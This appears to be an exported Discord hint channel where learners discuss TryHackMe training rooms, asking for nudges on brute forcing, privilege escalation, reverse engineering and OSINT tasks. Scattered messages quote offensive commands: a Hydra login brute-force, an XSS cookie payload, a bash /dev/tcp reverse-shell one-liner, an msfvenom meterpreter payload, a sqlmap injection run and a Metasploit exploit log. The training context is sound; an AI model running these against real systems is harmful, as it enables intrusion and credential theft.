#room-hints
but i get that system cannot execute a blank command, when i want to write something
of course, with a blank space
already tried with %20
i get it
Hi guys, doing the advent of cyber christmas challenges, the one where you have to brute force using hydra
I've tried everything, can you confirm that the machine works as intended? thank you
Web is broken?
https://tryhackme.com/room/hydra This is the same VM but with fixed web
Same flags too
Give it a go
got it, thank you James
hey @stuck fractal , ssh might be broken too; just tried all the possible passwords
It works for me
idk, I think it's probably this machine?
I wasn't able to solve the rdp challenge the other day until it got fixed
the one where you have to run the cert exploit
can i get a nudge on c4ptur3-th3-fl4g
task 5, security through obscurity? struggling to find the file within the file. tried viewing metadata
@next glen What's the IP?
10.10.11.240
I'll give it a go and get back to you
thank you, appreciate it
also tried a different list other than rockyou, I still get lots of output
no on the ssh one
I get 16 valid passwords for the web one
wouldn't wanna spoil anything, if I have, we can pm
Yes I did
Can't check that easily then
can't you deploy it yourself?
I can, but then it takes time to boot
something is wrong for sure
on this vm that I deployed, it's outputting way too many passwords
and I am certain that i'm using hydra correctly
SSH works.
can I pm you for a second?
let me what
DM me
hi all, im trying to figure out what the answer to question #21 is in the BP: Splunk room. - Have been researching and the only option that is logical is "rename".. Any help?
rename is not the correct answer obviously 🙂
Anyone can help with The Impossible Challenge? I managed to decrypt the question but I still have no idea...
I'm not sure what to put here. Can anyone help me? I thought it was root and Tryh4ckm3 ? It's probably a dumb question, but yea
I tried it twice. It loads the machine for a minute and in the end asks for credentials. Guess I should have not logged out of the machine in the first place. I'll just use PuTTY until the bug is fixed. Thank you!
Guys i'm doing bpnetworking stuck at "Of these addresses two are reserved, what is the first addresses typically reserved as?" I can think of localhost, loopback and 10.0.0.0, done online research but not found exact answer
@winged drum keep looking. You're on the right track.
if anyone is done with Retro CTF please let me know i can pm? I had some doubts
@spark monolith What are you stuck on?
The exploit present in the recycle bin isn't working @late patio
I'm surprised that room is still running. lol..If you found the exploit there is a video you can watch that shows you how to do it...It works, It just has a bit of an attitude.
i have gone through one of the writeups but i am not able to understand how they came to know about that cve? that particular exe gave them a direct admin shell
I have a problem with that too but i thought it should be that 
hey anyone has any hint for jigsaw room
the enumeration of the room gives me no result, i tried every scan tool i know
@glacial ember There's a reason it's rated as insane, but here's a hint ||wireshark||
it didn't work
Please remove the spoiler or put it in spoiler tags and simply
And I advise against looking at writeups without solving the box first, it ruins the fun. 🙂
yeah but when you're stuck and you don't know what you are looking for exactly ...
@tidal sedge and there is a same room on vulnhub
Just re-did alfred but without using metasploit, fun
For the scripting challenge, Task 2, I'm assuming there's a defined start port? The question is not entirely clear on that matter
@ripe hedge You start with port 1337.
Ok, so there is a dedicated start port ok
the starting point given is 3010
and it wasn't clear that the sequence was fixed
I don't remember this challenge well, but I have no idea why it says that 🤷
Let me check the writeups real quick
magic?
loool jigsaw 
the writeups assume 1337
good luck spotting the initial vector
but I'm trying to robustify the flimsy python
Yeah, Jigsaw was fun
yeah, the room itself is darn hard
Hi can someone please give me a very small hint regarding the bonus challenge in the learn linux room?
when do you recommend using find / -xdev vs just find / ??
How long does cracking the password for task 2 in basicsteganographyal take, just curious, I've been through ||8.17%|| of rockyou and still no password 
Room link: https://tryhackme.com/room/basicsteganographyal
@glossy basin Alright, thanks 🙂
hmm...the Hard problem in the Scripting room feels easier than the Medium problem...
Hello, can some1 give me a hand in room https://tryhackme.com/room/theimpossiblechallenge
Don't really know how to start :/
i've heard decrypting the hint is a good place to start, but i haven't really looked at it myself
aww thought so, but im not coming with anything with this letters mess xD
You can do that bit in Cyberchef
@inland onyx don't know if I would recommend Cyberchef to new 'learners'... it's a great tool but skips a few basic lessons that are valuable 🙂
Wonder if cyberchef has a docker image
don't think they originally have but maybe this helps @ripe hedge https://hub.docker.com/r/remnux/cyberchef/
Yeah ok there are several
@ripe hedge It's a static HTML/CSS/JS page
You can just open the file, or get a webserver for docker
Looked like node from the source
doesn't matter.. install node.. run it with node.. and you'll have it locally
but I would prefer a docker image tbf 🙂
Ok it webpacks it
So yeah it can probably live in an nginx
Oh haven't seen grunt in a while though
hmm grunt.... * grunts *
Firefox doesn't like serving JS from file:// anymore
Yeah not ie :p
😉
Not a fan of Chrome's devtools
The network stuff is a bit wonky compared to firefox
FF also has better CSS tools imo
depends what you're used to... I use brave (which is just kinda a chrome clone) always for the network devtools
To each their tools
but yeah.. isn't there a setting in FF to turn that off? maybe look for that on the webs
Probably but it's also good practice to leave the cors bits on
well everything for research right? 😉
:)
but yeah.. else just take the docker.. or build your own dockerfile
(that why i'd use a docker.. even faster, no nginx needed)
no extra tools at all.. tbf
Nginx docker image I meant
I like docker compose because I can never remember the cli arguments to run the thing
well.. that's a flaw.. you should fix that 😉 😛
... dude.. overkill much
Keep it PG13 guys 🙂
Ok, agreed that k8s is a crime against humanity
nah.. it depends what you use it for.. for yourself? yes.. overkill.. for a company that has a lot of services and isn't monolithic.. it's ok to use
I jest of course
“What is Google's top service across all their devices on this ASN?” There are no services listed on Ultratools ASN listings for Google
That seems obvious
Maybe it can’t be done on mobile
@white salmon Use shodan.
I know thank you, I just can’t seem to get to the right path on mobile, i’ll finish when I get to my desktop
@glossy basin I finally managed to find the password after 4-5 hours of cracking 🙂
nice!!
https://tryhackme.com/room/basicsteganographyal -- this one, the second task is not fun at all
maybe add a hint with the first letter of the password
The bruteforce in this reminded me of HTB's Smasher 2 😨 , though I think they removed the bruteforce part later
hello, I just finished the basic linux room, and I want you guys to tell me what rooms to do, I'm very confused and I don't know what to start with, kali linux? blue?,,, something else?
@white salmon I recommend following this guide: https://blog.tryhackme.com/going-from-zero-to-hero/
thx
So I'm doing the post exploitation basics. I'm following along the steps, so once I get to using the power view.ps1 and run it, I get errors. Like it doesn't want to run and I'm doing exactly as the guide is telling me to do. I even did the powershell -ep bypass. What am I doing wrong? I've used powershell scripts before and I can't figure out
Can you post the log?
Yeah give me a sec
also, go to #room-help
hey james, can you give a hint for this question on wifihacking101? @stuck fractal
@viral mason It's a part of the aircrack suite
Read some guides on how to use the tools packaged in there
look at the documentation, it's not hidden
ok thx
thanks man
Added it as a hint on the question
yup, completed the room, it was a nice ride thanks @stuck fractal
Now give it a go yourself
sure i will
Have logged into Shodan and searched for “What is Google’s top service across all their devices on this ASN?” There doesn’t seem to be any three letter acronym or word answer
try SSH
I haven’t learned SSH but i’ll see what I can do with the IP if that’s how it works
basically, it's asking what service i.e. protocol (http, https, dns, ftp, ssh, telnet, etc) is the most common across the specific Autonomous System iirc
I tried those when they appeared on Shodan, tcp, udp, dns but i’ll try the others, I guess it just wasn’t obvious enough for me 🙈
Thanks, thought it was looking for something like GCP - Google Cloud Platform as their “Service”
I wish it said protocol instead of service, that would have saved a lot of time lol
@white salmon HTTP, DNS, FTP etc are services.
two out of the three have protocol in their name
hypertext transfer protocol, file transfer protocol, domain name service
I do, but they're protocols
that whole page has protocols written all over it
And also service
That's because the page is about protocols
service occurs 14
I just never learned them with the term “Service” involved, i’m studying the A+ so I have only known them briefly as protocols, the port numbers for them and what they do
nmap -sV
how do i start entering text into a new vim document ? anyone
has anyone completed the HA Joker CTF?
man vim devprogramming
Morning, wondering if someone could offer a hint to task 5 Q1 of the xss playground. I get how to make an alert on the mouseover. I'm just not sure what it wants me to do with cookies?
I tried test" onmouseover="alert(Document.cookies)"
It just returned undefined
Nevermind, as i was rereading my post on here i noticed i had a caps on Documents. That seemed to fix it
Hello, is anyone facing issues in the task 7 11th question of the room "Network Services" created by PoloMints.
I am not able to get the reverse shell
anyone completed the Bookface room?
I can't get the password as it's not in the fasttrack dictionary
can anyone give me a hint on the dictionary to use?
it seems that port 22 is refusing the connection
can someone give me a hand on steel mountain? I've made a service exe, overwritten the existing one (using windows/shell/reverse_tcp), the service doesn't give the 1053 error, and hangs in start_pending, but doesn't throw me a shell back?
im listening on 8080
any hints on how to see the func address in task 7 in Buffer overflows ?
tried via r2
but my r2 skills failed 😦
Do the radare room?
bookface has always had that problem iirc
i think Ninja/james found it in rockyou at some point
the password is in fasttrack but for some reason it doesn't work if i remember correctly
@wraith marsh did that but I don’t see how I get the func address still
use r2 to print the list of functions, it has the address next to it
yes and that is my question howto do 🙂
If you had done the Radare2 room you would know
its in there
Ima have to say TryHarder on that
okay i will go back and revisit
okay got it, what is now the best way to calculate the payload, or rather how to overflow to a specific address ?
with a cyclical pattern generator
Yes, i just need a way or a pointer on how to proceed
What room?
Probably chuck it in a debugger and see what you can do
If you're overflowing a buffer where the binary is doing a strcpy or similar, you can get the address of the start of the buffer using ltrace
Task 7 is overwriting a function pointer IIRC
Yes
Hey all, I'm having issues with 2 questions in the Splunk room and could use a nudge.
Specifically Task 2, questions 21 and 23. I know the answer for 21, but it refuses to accept it.
Hey all, I'm having issues answering question 6 on task 2 for the lord of root challenge
can anyone help me please
?
nevermind added 2 spaces and not one
Hey, can anyone give me help on ctf 100 room . I'm stuck on stage 5 task 12th , after Flag 71.
Am I just a dummy, or is django supposed to be giving me such a hard time with starting an app?
I am dumb. I got it.
How do I add tags
Verify with the bot
It should have sent you a message
Also, try asking in #general 🙂
Thanks
Why it not working for me? Any hint?
@white salmon wrong username
so this is no john or james from this message inside?
You've assumed the format of the username
firstname or firstlast
Try other formats
ok thank you @stuck fractal i got it 🙂
in room ccradare2 any hint on the final questions ?
for the life of me I can't tell the difference between the 2 different logins with the phishinghidden I room, what am I missing
I'm trying to brute force a simple login.asp page. I've successfully used hydra in the past where the previous exercises were http-post and I was able to see a failure message that I could feed to hydra. In this case it's an http-get type login and there isn't a failure message that renders in the browser on a failed login attempt. The only reason I can tell it failed is because of the 302 response code. I think hydra requires either a success or failure string as the third http-<method> arg so I was wondering if there's any way to specify the http response code instead. Anyone else run into this?
hydra -l admin -P <password_list> <ip> http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
^^thats the syntax I'm used to for POST forms where there's a failed login message of "Login failed"
just wondering if there's any workaround if there's no success or failure message
You can try to use something on the login page, assuming it redirects there
I've been working on this for a long time and I just gotta ask for help now ... even with all the walkthroughs I follow step by step perfectly I can't get my shell uploaded. I'm getting this error on DogCat when trying to send the shell.php from burp, this is the error I see in the log: file_get_contents(http://10.8.10.142/shell.php): failed to open stream: Connection refused in <b>/var/log/apache2/access.log
in basic pentesting when i use hydra to find the pass i try with the ssh port and it will take 2 hours to find with a normal wordlist
@dusky zephyr No
It predicts 2 hours
It could be sooner
Much much sooner
have you considered trying it out first? @dusky zephyr
hm i am trying now i use john wordlist threads 4
Hydra and John have very different purposes
If you don't know the difference or what each does, you should really find out.
any other wordlist which i could use.
rockyou
@solemn smelt thanks
am I missing something with the SQLi labs
there's not a lot of info
am I supposed to be proficient with SQL injections before doing the SQLi labs room
Hi there, I don't find the zip file mentioned in Agent Sudo task 3 #2, who could give a hint?
@white salmon yes, SQLi labs is not teaching anything
but a SQLi teaching room is coming soon
ok cool
do you happen to know of a good beginner resource
I got stuck on the OWASP juice shop and went looking for SQLi lessons
Got stuck at django ctf hidden flag. Any hints please?
I'm on task 5 of the OWASP juice shop, trying to find more info on Jim so I can reset his pw
I've tried escaping the product search query like q=juice' order by 1-- and I tried similar in the product comments
Hi guys I am busy with introresearch question
#5
If a password hash starts with $6$, what format is it (Unix variant)?
I know it is sha-512
But what do they mean with format ? i think that I am searching way too deep into sha-512
Because I am currently looking into how the algorithm is built..
@white salmon "He's dead, Jim"
Figure out which famous Jim he is, the rest is osint
@thorn finch assuming you're trying to crack it with hashcat, check the help
||king@ubuntu:~$ ps aux | grep openvpn
king 886 0.0 0.2 14224 1020 pts/0 S+ 06:04 0:00 grep --color=auto openvpn
this is supposed to be running a root cron job and it's not so i can't get root.... it's on LaxCTF||
Process owner is the user, so...
nvm i got it now
Hi, did anyone complete RP : Nessus on the Windows platform ?
https://tryhackme.com/room/rpnessus
I got an issue on [Task 4] scanning result
This is my final Nessus scanning result, which is a lot different from the actual scanning result. Someone said that I am not performing full scan. Does anyone know how to perform it ? I have done all the settings given in the room btw
do you have set up all the ports and scripts?
The basic scan result that I have got finally
@white salmon what do you mean, set up the scripts ?
@white salmon does it count as set ?
I have enabled the scan type to all the ports btw
looks ok
I am stuck at Anthem's reverse shell wherein I am trying to download the nishang PS reverse TCP and it's getting detected by antivirus...any hint to bypass it?
I'm doing the Ignite Room but not getting a reverse shell. I tried two different writeups but still not getting it. Any idea why it's happening?
Is this some kind of command injection?
can someone help me with the final exam question on the cc: radare2 room?
here's a link for it https://tryhackme.com/room/ccradare2
all the other questions and examples were easy
but im lost on the final one
Hi guys, I am trying to read a file on the FTP section of network services
! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
I have to choose from these commands, any ideas?
download with get
thanks. I think the machine dropped, which is why it won't work 😅
that'll usually be a good cause
in Windows PrivEsc Arena task 1, I'm trying to avoid metasploit so I'm listening for the reverse shell with nc. it has shown that it is connected but no output. I used the command msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.64.30 lport=4444 -f exe -o program.exe R and fetched it from a webserver...can anyone provide a hint please
@noble tinsel You have a meterpreter payload.
yeah i just realized
That's the opposite of avoiding metasploit
thank you
Hey all, I am experimenting with DVWA brute force on the high security. I have a python script using the requests & bs4. My big issue is after I grab the "user_token" and then pass it in as a portion of the data, the html that gets returned shows no difference between a correct authentication combo and an incorrect one. Any ideas on why this is?
Code Here -- https://pastebin.com/n5BXfRXC
can someone help me with the final exam question on the cc: radare2 room?
@little tapir still stuck?
so.. on the Basic Pentest box, is ||K's ssh key|| actually used?
couldn't get the password to work
@ripe hedge it was for me
ok... I abused an suid root program to read the files...
ah I see.. did not know how to crack the key password
thank you google
anyone got a hint for the final question for linux walk through?
i've discovered nootnoot has sudo privileges, and went to their home dir but couldn't see anything more
@white salmon Maybe look for files belonging to all users, you might be able to gain access to nootnoot
i noticed the .sudo_if_admin_successful thing
that's a lot of files :|
shall look
is it something that should stick out, like really out of place - or is it more covert than that
Fairly overt
ok, shall look
note to self: dont do this at 3am
brain no work
I'm stuck - i found my way into ||/run/ where there are some interesting files like "sudo" (apparently an executable directory???)|| but I'm stuck from here
@white salmon ||belonging to shiba2||
hmm
is it anything to do with ||the tmp dir? i see tmux-1001||
im also guessing i can ||ignore /proc and /sys?||
Yes you can ignore that
is there a way i can remove ||proc and sys|| from my results? they're bloody annoying
Instead of find /, you could find in each directory
could you elaborate on that?
not sure what you mean
i did ||find / -user shiba2|| to get everything by them
and then i piped it to an output file, winscp'd it to my desktop and removed all mentions of ||/proc and /sys||
hmm ight
@stuck fractal i cracked it
i cannot believe it took me THAT long to see something THAT obvious
i cry
thanks
Which image shows a legit web-page? Anyone
Stuck in Extreme Obf challenge in JVM Reverse Engineering room.
I extracted the required code from the decompiler and used it to create the same java file that would print out all the strings. But all the strings come out with Japanese characters in b/w them
https://tryhackme.com/room/theimpossiblechallenge# I need some hint on this.. Task1
||Spoiler Test||
did u decode the hint? @indigo ridge
@heavy stump This chat is for hints not help
I sort of need a hint/clarification on what a task is asking of me.
I'm doing the Linux Challenges room and this is on Task 4, question 7.
I'm unsure if it's asking me to basically list all files on the machine to find a file that starts with the name "4bceb", or if it's asking me to find a file that has a string that begins with "4bceb"
@drowsy blaze The flag starts with those chars. Find the flag
cool thanks!
Any hints on Radare2 room the final exam ?
@mild eagle I am about to start that task, I will let you know if I can figure it out
About when Lola started her photography, I'm not so sure it isn't glitchy. Without giving too much away, I did read the blog page and can see where she literally mentions that it's been "X" date since she started, yet entering that date is regarded as a wrong answer. Since it's just that obvious, I'm not so sure it isn't glitched. Just saying -- on the other hand - I LOVE this exercise as it's about getting info on the user - it's surprising how much info people leave online!
@remote leaf You need to do some maths
The ||page you're looking at is a snapshot in time||
I'm aware I have to do math. She's literally saying she started Y years from X date which is shown on the webpage, it's basic math. 🙂
@remote leaf Read the question carefully, you're told how to format the date
Sorry about rule 1 earlier.. I didn't read it before. I did now. I understand what you're telling me. Sneaky, boss!
@remote leaf Not sneaky, THM is a british company. Read the damn questions
so for a room i am in, it wants me to nmap, i can do this still if I'm on a kali vm even if the vm isn't connected to the openvpn?
Connect the VM to the OpenVPN. Don't connect from the host
Kali comes with it installed @white salmon
oh okay
Greetings, I have a basic question which I don't know how to solve, perhaps someone can give me an insight.
I was doing the Basic Pentesting and I needed to use John to crack the RSA Private Key after making it read only.
My issue however is that while using John w/ RockYou.txt, instead of the solution it gives me an output with <?> symbols.
I went to the extent of checking the Writeups and following them, but the problem still persists.
Thank you for your time in case you end up reading it.
I'm working on CTF 100, and I don't know what cipher comes to mind with this string.
The second flag haha
Wait nevermind it's rot13
@white salmon It'd be a lot easier to help if you posted screenshots
Sorry for the quality, couldn't print screen, not using discord on the laptop momentarily.
@white salmon Ok, look at the file you're giving john
.gz
that's compressed
you need to decompress it
Any command in particular to decompress? I'm new to this, but willing to learn.
And thank you for your help.
gunzip
Thank you it worked!
The issue was indeed what you told me.
@stuck fractal I really appreciated your help. Thank you once again!
ctfcollectionvol2 - maybe above my knowledge level, but currently stuck at easter egg4. have tried to throw what little i know at it. tried sqlmap a bunch of times. i think i have approached the blind time based sql with it in a few ways, but nothing came back with.
sqlmap -u 10.10.7.219/index.php? --technique=t --time-sec=3 --forms --crawl=2 --level=3 --risk=3
nothing coming back.
any suggestions to get more info on better use of sqlmap or maybe a tip👍
I'll look at it
@steady rampart I'll see what I can pick at when I get to it. Seems interesting.
hey everybody
has anyone done this room
if yes could you please help me how you crack this hash
11FE61CE0639AC2A1E815D62D7DEEC53
@plucky steppe in the last task before the final exam did you see the msg? I could see it was supposed to print out i.e. I’ve changed the value, but no output was shown on screen
@tribal ginkgo googling is your only option, using the sites like md5hashing, md5decrypt etc..
@hasty slate I tried there didn't get there anything
yeah lol.. maybe use a writeup.. I didn't find that hash either in any of those sites.
it is not bruteforcable
@hasty slate i saw the writeup, there was a direct answer given, no way to find out how they got it
yes i used hash-identifier
its says md5, or ntlm
its not md5
its ntlm
@shrewd verge
yea ntlm.. due to the hints given
yes
tried hashcat with rockyou
didn't get anything
I know the answer due to writeup , but
how do we get there
yea i saw the same writeup... still figuring the same.. how he get the plaintext.. maybe need bruteforce?
if it's that long and you try to brute force in hashcat it gives you integer out of length
going take ages...
well it did not give length but i gave the -m 1000 (ntlm) -a 3 (bruteforce)
yeah its using 7 length but as you already know the answer is pretty big
XD room of patient
@shrewd verge with task 4 question 1
shodan gives result with answer with different format.
well it's either the ASN you use is not the same as the question.. i did find a few ASNs for google
which give different answer
i will try with other ASN's
try the one on the example.. n the one from you google
i am using ||AS15169||
what did u get for the answer?
||Windows Server 2008||
that's the correct answer.. did u submit it?
😆 that's weird.. i submit and it's correct..
now it is accepting
earlier answer format was different now it changed
i dont know what was the problem Xd
anyways thanks👍
who does that and how?
the room creator fixed it
basically, the operating system changed since the room was created
so this is why it should have been changed
and here i was thinking there is something wrong with me
any hints on dogcat? .. i did find only the php filter lfi
ahhh i got it
😆 👍 1st flag
Uh, that looks like it is a flag
(On which note, mind editing it out @white salmon?)
Which question is it exactly?
Easter 4 on ctfcollectionvol2
how can I scan ports for files with nmap?
You don't?
But in the room "Advent of Cyber" Day 7, last task, I have to do this
How?
look up the process thats running on google and how to interact with it @shell sun
Lol, thank you. I didn't know that you can do this
@mild eagle hey sorry for the late reply I could not figure out the last question on Task10
@plucky steppe just solved it see in community hell my replies to forser he is also struggling
@mild eagle Yeah I am actually reading them now haha
Hello all,
i'm trying to decrypt a file (not related to a room)
Any tool suggestion?
Greetings, I'm doing the Anonymous v6 Room & I am stuck.
I need to create a reverse shell and import it through ftp.
My questions:
• What IP & Port do I use as my own inside the .bash.sh [The virtual IP Address provided by TryHackMe?]
• When I try put directory/bash.sh to import I get disconnected by the ftp connection
I've never created a reverse shell, I appreciate the help.
You should always be using your VPN IP address
The target can't talk to you with any other address
As the reverse shell command I wanted to use: bash -i >& /dev/tcp/<ip>/<port?> 0>&1 but I don't even know how to make it work or upload to the ftp target without getting disconnected. Any hints?
I recommend doing other rooms first and learning how reverse shells work and how FTP works
Thank you, please let me know if you recommend any of the rooms.
Regarding Intro to x86-64, I'm having trouble getting the answer to "If Statements Continued #1".. I set a break point immediately before the retq and pop instructions, but the answer is being shown as wrong
Anyone have any hints?
It'd be much appreciated 😄
what did you put for the answer @fiery garden
63
@fiery garden is that the value for var_8?
I know for one of the questions you have to convert it from ||hex to decimal||
I'm setting a break point at 0x5562f623c637 and checking the value 'px @rbp-0x8' - Am I reading the output wrong?
@fiery garden yeah I got a different answer you are close though but its not 63
are you using the binary if2?
that ||60 value is hex|| @fiery garden
Thanks for your help. So are all of these values typically in hexadecimal?
not always
The other answers didn't need to be converted so I imagine their hexadecimal values were the same as their decimal values
Alright gotcha. Thanks again! I should have better read the note on the page, "The value stored in memory is stored as hex."
What do I do with crontabs hint i’ve been stuck in it for like 2 hours
I see all users get x permissions but I still can’t use sudo in the correct directory ; /
In Linux Ctf my hint for flag 4 is crontabs, I saw the usr/bin/sudo is r-x for my group but sudo doesn't work to get in crontabs for flag
That just means you can run the sudo program
That doesn't mean you can actually run commands using sudo
You need to actually look where crontabs are stored or created
I found crontabs I just don’t know what to do once I find it
I’ve tried cat with sudo ./ and ~/ etc or cd etc
Just says bob is not in sudoers file, this incident will be reported
Have you considered that you're just fumbling and throwing sudo at stuff when you're met with a problem?
Because you really shouldn't just use sudo if something doesn't work
Yes i’m a novice throwing stuff at it that I think might work
Don't throw sudo at problems.
And it hasn’t been working
Hello there again, i have a few issues in the intro X86_64 challenge
i don't understand this question, task 4:
What is the value of var_8h before the popq and ret instructions?
what is the issue with that question?
Well that's wrong
so it is
i am following the tutorial in the past if1 executable
same instructions to get the value
and etc...
do it again so
are you sure you are looking at the right value? are you sure you are looking at the time just before the pop and ret instructions?
break points are in jge and jmp
Are you using the if2 binary?
yes look at output:
(fcn) main 68
| int main (int argc, char **argv, char **envp);
| ; var int32_t var_ch @ rbp-0xc
| ; var int32_t var_8h @ rbp-0x8
| ; var int32_t var_4h @ rbp-0x4
| ; DATA XREF from entry0 (0x5601fb7ce50d)
| 0x5601fb7ce5fa 55 pushq %rbp
| 0x5601fb7ce5fb 4889e5 movq %rsp, %rbp
| 0x5601fb7ce5fe c745f4000000. movl $0, var_ch
| 0x5601fb7ce605 c745f8630000. movl $0x63, var_8h ; 'c' ; 99
| 0x5601fb7ce60c c745fce80300. movl $0x3e8, var_4h ; 1000
| 0x5601fb7ce613 8b45f4 movl var_ch, %eax
| 0x5601fb7ce616 3b45f8 cmpl var_8h, %eax
| ,=< 0x5601fb7ce619 7d0e jge 0x5601fb7ce629
| | 0x5601fb7ce61b 8b45f8 movl var_8h, %eax
| | 0x5601fb7ce61e 3b45fc cmpl var_4h, %eax
| ,==< 0x5601fb7ce621 7d0d jge 0x5601fb7ce630
| || 0x5601fb7ce623 8365f864 andl $0x64, var_8h
| ,===< 0x5601fb7ce627 eb07 jmp 0x5601fb7ce630
| ||`-> 0x5601fb7ce629 8145f4b00400. addl $0x4b0, var_ch
| || ; CODE XREF from main (0x5601fb7ce627)
| ``--> 0x5601fb7ce630 816dfce70300. subl $0x3e7, var_4h
| 0x5601fb7ce637 b800000000 movl $0, %eax
| 0x5601fb7ce63c 5d popq %rbp
\ 0x5601fb7ce63d c3 retq
I mean you can dump assembly in here all you want
It's not really going to help
You need to analyse the memory when it's running
yes, but you are asking if the file that I am running is if2, so my answer is yes, because var_8h and var_4h are different from the first one
yes, the other question was if I am finding the correct value, and yes I do; I found the other question answers, look
Pls don't post answers @ripe rock
I did that room, I know the value is not 63
You can post screenshots of questions, just either blur or remove answers to others (:
thanks, I forgot to use a spoiler
so, try to use breakpoints to find out what the value is
Even with a spoiler it would have been removed
breakpoints are on jge1, jge2 and jmp
But yes, different breakpoints as Pelado suggested (:
also I tried on cmp
try harder (and different)
what do you mean?
use breakpoints in another points
No, I did use breakpoints (jge, jge, cmp, movl after the first jge and andl, movl in the var_8h first lines)
@steady stratus So you are telling me that I am wrong 6 times?
If you've tried 6 times and been told your answer is wrong 6 times, then yes
hello can anybody give me a hint on zeus ?
It's not a public box, Elf
Mhm yeah, I mean If the answer you suspect it isn’t accepted on the website then...
I haven’t done that room in a long while so I’m not quite sure of the breakpoint @ripe rock. Though I don’t remember it being too hard, but the room isn’t aimed for me in that regard
Keep on trying man (: id run through it but I’m just about to log off gl with it
@steady stratus So you are more of a website than a binary person?
@stuck fractal nvm, I got in lmfao
@white salmon Try harder.
i just did 😛
@ripe rock So, you set the breakpoints. Did you then dump the stack?
For the record, I'm not looking at a writeup, ok??
@stuck fractal Yes, I check for the values doing dr
@ripe rock So you're just printing the registers?
@ripe rock How'd you mean?
That's not going to get you very far
You're not looking for a register value
You're looking for a variable value, variables are on the stack
You need to dump part of the stack
@steady stratus That you know more about networking and websites, but not too much about RE or malware analysis.
Ah gotcha, sorry haha. My degree specialises in malware analysis (: @ripe rock I just haven’t done that room in a long time so I need to look back on it :^)
@steady stratus You are now my hero jajaj, that degree is difficult, you need a good memory to keep track of variables in assembly. Anyway, thanks to @stuck fractal, he gave me the answer by saying "You're not looking for a register value", because in my notes I did it without doing px @rbp-whatever 🤣 because I didn't want to look at my notes, in order to prove that I learned it
Remember the difference between registers and variables.
@stuck fractal Yes, I will update my notes now
How do I gunzip without permission on flag12 in the Linux CTF room?
Linux Walkthrough: trying to do the final question, the contents of /root/root.txt. I've found the other two users; I've discovered the "simple" user's password and can login, but I can't get into the other user account which is a sudo one. At this point, I'm stumped.
Check users privileges and file owners
Room blue: It says to scan for an exploit and use it, and confirm whether it's working, but I get
[-] 10.10.210.255:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
Edit: Solved!
glad you got it
dogcat room, are there any hints on flag 2? =/
been fuzzing for 2 days.. still looking for more tutorials
@shrewd verge you've had a program running for 2 days??? there are problems like that??
I had a phonecall so I took a break. I think I was almost done with it
It's a walkthrough so I shouldn't be stuck at this at the very least
ok ^_^
well, I have no idea how to LFI for the other flag.. I only got the first one @visual tapir
Linux Walkthrough: trying to discover contents of /root/root.txt. I binary-edited the /opt/rescue/shiba4 to change the cat'ed file to /root/root.txt, on the basis it is a suid binary and should be able to access root's directory. No, permission denied.
I'm confused. Did you get stuck or...?
@sharp crystal instead, try to find files which belong to each user (using find command) and see if you find anything useful
@glossy basin Got it! thank you.
BTW, 'vim -b' doesn't honour the setuid flag when saving the file (why the first approach didn't work). Not sure if that's a bug or a feature. 🙂
In the XSS room keylogger part, am I doing something wrong? Every time I try to paste a keylogger script the server stops; also tried with the example keylogger
@sharp crystal if you edit a suid binary, it loses the suid bit. Doesn't matter how.
Hello everyone
I'm on GoldenEye
for the POP3 BF, should I use rockyou or another wordlist?
||in the Lord of the Root room I have tried port knocking ports 1,2,3 but that doesn't open up any ports as it should, can someone help me out with the syntax of port knocking?||
it is already finished
Can anyone suggest a dictionary for BookFace, because the fasttrack dictionary does not work.
?
@echo thunder Rockyou
ok thanks
I use vim all the time, and I'm confused about what the vim room task 2 question 2 is asking me
like.. you just press "i" to insert and start typing lol
@visual tapir Once you're in insert mode
You answered it right there
Think less hard.
the answer format is 6 chars, and it's not "insert" or "INSERT"
wow.. nvm
a "LOT" less hard
kind of confusing question though to me at least
@stuck fractal thanks lol
[-] Handler failed to bind to <mypublic_ip>:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Retrieving session ID and CSRF token...
[*] Finding CSRF token...
[*] Uploading and deploying qfSElhAWa4t7XtO...
[*] Uploading 6267 bytes as qfSElhAWa4t7XtO.war ...
[*] Executing qfSElhAWa4t7XtO...
[*] Executing /qfSElhAWa4t7XtO/qxkRCwy0TJWm55NUGvp7o23M.jsp...
[*] Finding CSRF token...
[*] Undeploying qfSElhAWa4t7XtO ...
[*] Exploit completed, but no session was created.
How do I fix this?
while I'm trying to do Metasploit on the ToolsRus room
@swift falcon Why do you have LHOST set to your public IP?
It needs to be your VPN IP
@visual tapir I hated that question and the answer is really really dumb
anyone have time for a quick sanity check on Brainpan :)?
Sure, what's up
root@brainpan:/root# whoami
root
root@brainpan:/root#
@oblique cliff managed to figure it out ^^ forgot my nopsled
hmm, having some trouble with the Alfred box. I've tried several things to get into the Jenkins box, to no avail: bruteforcing is probably not going to work, tried with several potential usernames: bruce, and alfred (guessed from the server on port 80). Gobuster is a no-go, there's nothing on 80, 8080 redirects everything to the login page. Metasploit doesn't seem to have anything that works, though having the version number would help narrow things down. ...and I am dumb, I hadn't tried the REALLY obvious user/password yet
login worked
what do you think is the "really obvious" user/password? why not give it a go? (rhetorical)
yeah I just did it
You know the box is Jenkins, maybe that can help you figure out the password (more so than just the username jenkins)
someone left the default superuser password 🙂
taking a while to sign in though, I might've accidentally ddosed the box
It's a windows box so can be a little bit sluggish - especially for stuff like first sign ins ^^
it's also Java so fair point
Oh I didn't say anything bad there
you just interpreted it as so 😉
which confirms my point :PPP
@steady stratus can you please help me more, if possible
well, thanks room for being a good rubber ducky 🦆 🙂
whee got a shell
room: HackBack2019
task: 4
question: 5
issue: The first flag received does not work, checked the writeups and it states the same flag.
Would be highly appreciated for any assistance!
Known issue.
and bingo, root flag....that'll teach me to overthink this stuff
well played (:
so in a writeup, do you list everything you did, or are these things edited to show the shortest path?
more or less
gotcha
at least IMO
took some notes on this one
is there a way to get the user/pass on the Alfred room without guessing?
or I suppose you're supposed to research defaults
I believe that one was defaults iirc
Hello, has someone in here done the injection challenge?
@ripe rock Don't ask to ask, just ask.
this question from almost the last task
Print out the MOTD. What favorite beverage is shown?
Did you print out the motd?
